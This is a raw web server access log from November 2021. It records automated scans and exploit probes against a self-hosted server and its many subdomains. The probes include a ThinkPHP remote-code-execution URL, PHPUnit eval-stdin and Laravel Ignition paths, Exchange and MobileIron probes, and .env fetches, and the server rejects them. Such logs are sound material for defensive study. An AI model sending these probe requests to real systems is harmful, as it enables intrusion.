Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Nov/2021:18:50:04 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Nov/2021:18:50:04 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Nov/2021:18:50:06 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [08/Nov/2021:18:50:06 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Nov/2021:18:50:07 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Nov/2021:18:50:08 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Nov/2021:18:50:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Nov/2021:18:50:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Nov/2021:18:50:12 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Nov/2021:18:50:14 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [08/Nov/2021:18:50:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Nov/2021:18:53:01 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [08/Nov/2021:18:53:22 +0000] 444 - GET https agent.moralanimal.net "/sitecore/shell/ClientBin/Reporting/Report.ashx" [Client 194.48.199.78] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.1 Safari/605.1.15" "-" [08/Nov/2021:19:03:19 +0000] 444 - GET https 64.22.31.253 "/webadmin/Index.action" [Client 54.36.108.101] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0" "-" [08/Nov/2021:19:18:13 +0000] 400 - - http localhost "-" [Client 87.251.64.138] [Length 154] [Gzip -] "-" "-" [08/Nov/2021:19:56:00 +0000] 400 - GET http localhost "/ab2g" [Client 68.183.35.71] [Length 154] [Gzip -] "-" "-" [08/Nov/2021:19:56:00 +0000] 400 - GET http localhost "/ab2h" [Client 68.183.35.71] [Length 154] [Gzip -] "-" "-" [08/Nov/2021:20:22:07 +0000] 444 - GET https 64.22.31.253 "/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" [Client 185.189.151.27] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36" "-" [08/Nov/2021:21:33:03 +0000] 444 - GET https jdownloader.moralanimal.net "/" [Client 34.77.162.31] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [08/Nov/2021:21:34:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [08/Nov/2021:22:13:01 +0000] 400 - - http localhost "-" [Client 87.251.64.138] [Length 154] [Gzip -] "-" "-" [08/Nov/2021:23:13:54 +0000] 444 - GET https 64.22.31.253 "/" [Client 87.120.36.76] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36" "-" [08/Nov/2021:23:21:20 +0000] 400 - GET http localhost "/" [Client 134.122.47.99] [Length 252] [Gzip -] "-" "-" [09/Nov/2021:00:51:51 +0000] 400 - - http localhost "-" [Client 87.251.64.138] [Length 154] [Gzip -] "-" "-" [09/Nov/2021:01:27:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.232.7] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" "-" [09/Nov/2021:01:44:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [09/Nov/2021:02:41:56 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.204.232] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Nov/2021:05:25:16 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.208.229] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Nov/2021:05:25:55 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.204.110] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Nov/2021:05:29:26 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.198.208] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Nov/2021:05:50:30 +0000] 444 - GET https www.agent.moralanimal.net "/wp-login.php" [Client 54.198.193.248] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.agent.moralanimal.net/wp-login.php" [09/Nov/2021:06:46:33 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [09/Nov/2021:07:58:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [09/Nov/2021:08:20:30 +0000] 444 - GET https whoami.moralanimal.net "/" [Client 34.77.162.8] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [09/Nov/2021:10:11:58 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [09/Nov/2021:10:31:27 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.195.250] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Nov/2021:10:55:48 +0000] 444 - GET https www.auth.moralanimal.net "/wp-login.php" [Client 3.93.185.23] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.auth.moralanimal.net/wp-login.php" [09/Nov/2021:11:08:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [09/Nov/2021:11:33:24 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0" "-" [09/Nov/2021:11:33:24 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.12 Safari/534.24" "-" [09/Nov/2021:11:33:29 +0000] 400 - - http localhost "-" [Client 222.186.19.235] [Length 154] [Gzip -] "-" "-" [09/Nov/2021:13:21:00 +0000] 444 - GET https tpm.moralanimal.net "/" [Client 34.86.35.30] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [09/Nov/2021:13:29:04 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.204.181] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Nov/2021:14:19:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [09/Nov/2021:16:05:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.200.84] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Nov/2021:16:17:21 +0000] 400 - - http localhost "-" [Client 89.248.165.210] [Length 154] [Gzip -] "-" "-" [09/Nov/2021:16:46:10 +0000] 444 - GET https www.bitwarden.moralanimal.net "/wp-login.php" [Client 54.196.161.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.bitwarden.moralanimal.net/wp-login.php" [09/Nov/2021:17:35:10 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [09/Nov/2021:18:23:55 +0000] 444 - GET https www.books.moralanimal.net "/wp-login.php" [Client 54.163.49.100] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.books.moralanimal.net/wp-login.php" [09/Nov/2021:18:25:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [09/Nov/2021:18:27:47 +0000] 444 - GET https www.booksonic.moralanimal.net "/wp-login.php" [Client 18.212.218.175] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.booksonic.moralanimal.net/wp-login.php" [09/Nov/2021:18:35:21 +0000] 444 - GET https www.bookstack.moralanimal.net "/wp-login.php" [Client 18.212.218.175] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.bookstack.moralanimal.net/wp-login.php" [09/Nov/2021:19:00:45 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 3.80.108.135] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [09/Nov/2021:21:46:40 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Nov/2021:21:46:41 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Nov/2021:21:46:42 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Nov/2021:21:46:42 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Nov/2021:21:46:44 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Nov/2021:21:46:44 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [09/Nov/2021:21:46:45 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Nov/2021:21:46:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Nov/2021:21:46:48 +0000] 400 - POST https localhost "-" [Client 45.146.164.110] [Length 154] [Gzip -] "-" "-" [09/Nov/2021:21:46:48 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Nov/2021:21:46:49 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Nov/2021:21:46:50 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Nov/2021:21:46:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Nov/2021:21:46:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Nov/2021:21:50:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [09/Nov/2021:21:52:57 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [09/Nov/2021:21:53:28 +0000] 400 - - http localhost "-" [Client 5.188.210.227] [Length 154] [Gzip -] "-" "-" [09/Nov/2021:21:54:47 +0000] 400 - GET http 5.188.210.227 "/echo.php" [Client 5.188.210.227] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "https://www.google.com/" [09/Nov/2021:21:54:55 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Nov/2021:22:50:05 +0000] 444 - GET https 64.22.31.253 "/ReportServer" [Client 192.241.197.125] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Nov/2021:23:09:32 +0000] 444 - GET https 64.22.31.253 "/login" [Client 192.241.206.59] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Nov/2021:23:44:06 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [09/Nov/2021:23:44:06 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [09/Nov/2021:23:58:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 87.120.36.76] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-" [10/Nov/2021:00:05:59 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [10/Nov/2021:00:08:10 +0000] 444 - GET https www.cloudcmd.moralanimal.net "/wp-login.php" [Client 34.207.245.125] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.cloudcmd.moralanimal.net/wp-login.php" [10/Nov/2021:00:28:49 +0000] 400 - - http localhost "-" [Client 172.104.131.24] [Length 154] [Gzip -] "-" "-" [10/Nov/2021:00:42:06 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [10/Nov/2021:00:42:06 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [10/Nov/2021:00:42:06 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [10/Nov/2021:00:42:06 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [10/Nov/2021:00:42:06 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [10/Nov/2021:00:42:06 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [10/Nov/2021:00:59:01 +0000] 444 - GET https www.cockpit.moralanimal.net "/wp-login.php" [Client 54.226.99.224] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.cockpit.moralanimal.net/wp-login.php" [10/Nov/2021:01:05:41 +0000] 400 - GET http 64.22.31.253 "/" [Client 35.176.5.14] [Length 252] [Gzip -] "'Cloud mapping experiment. Contact research@pdrlabs.net'" "-" [10/Nov/2021:01:31:41 +0000] 444 - GET https www.comics.moralanimal.net "/wp-login.php" [Client 3.82.36.189] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.comics.moralanimal.net/wp-login.php" [10/Nov/2021:01:31:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [10/Nov/2021:01:39:21 +0000] 444 - GET https www.cookbook.moralanimal.net "/wp-login.php" [Client 54.163.30.25] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.cookbook.moralanimal.net/wp-login.php" [10/Nov/2021:02:41:25 +0000] 444 - GET https imap.moralanimal.net "/" [Client 34.96.130.7] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [10/Nov/2021:02:42:50 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.199.7] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Nov/2021:02:54:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 87.120.36.76] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Falkon/3.0.0 Chrome/65.0.3325.230 Safari/537.36" "-" [10/Nov/2021:03:24:50 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [10/Nov/2021:04:57:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 154.209.125.21] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [10/Nov/2021:05:20:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.62] [Length 0] [Gzip -] "-" "-" [10/Nov/2021:05:23:51 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.204.110] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Nov/2021:05:23:59 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 198.199.112.26] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Nov/2021:05:25:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [10/Nov/2021:05:26:14 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.200.61] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Nov/2021:06:27:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [10/Nov/2021:08:15:57 +0000] 444 - GET https www.deluge.moralanimal.net "/wp-login.php" [Client 54.235.52.155] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.deluge.moralanimal.net/wp-login.php" [10/Nov/2021:09:23:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 170.130.187.18] [Length 0] [Gzip -] "https://gdnplus.com:Gather Analyze Provide." "-" [10/Nov/2021:09:47:25 +0000] 444 - GET https www.downloader.moralanimal.net "/wp-login.php" [Client 3.144.48.226] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.downloader.moralanimal.net/wp-login.php" [10/Nov/2021:09:47:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.195.93.98] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [10/Nov/2021:10:13:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 178.32.197.95] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0" "-" [10/Nov/2021:10:17:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 161.35.20.16] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8" "-" [10/Nov/2021:11:10:12 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [10/Nov/2021:11:53:22 +0000] 444 - GET https www.emby.moralanimal.net "/wp-login.php" [Client 13.59.162.164] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.emby.moralanimal.net/wp-login.php" [10/Nov/2021:13:17:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [10/Nov/2021:14:05:13 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.208.247] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [10/Nov/2021:16:14:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 117.50.38.174] [Length 0] [Gzip -] "-" "-" [10/Nov/2021:16:14:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 113.31.102.176] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [10/Nov/2021:16:15:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.173.120] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [10/Nov/2021:16:16:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.173.120] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [10/Nov/2021:16:51:01 +0000] 444 - GET https www.guacamole.moralanimal.net "/wp-login.php" [Client 3.12.85.2] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" "https://www.guacamole.moralanimal.net/wp-login.php" [10/Nov/2021:16:56:56 +0000] 444 - GET https www.grocy.moralanimal.net "/wp-login.php" [Client 34.229.121.204] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" 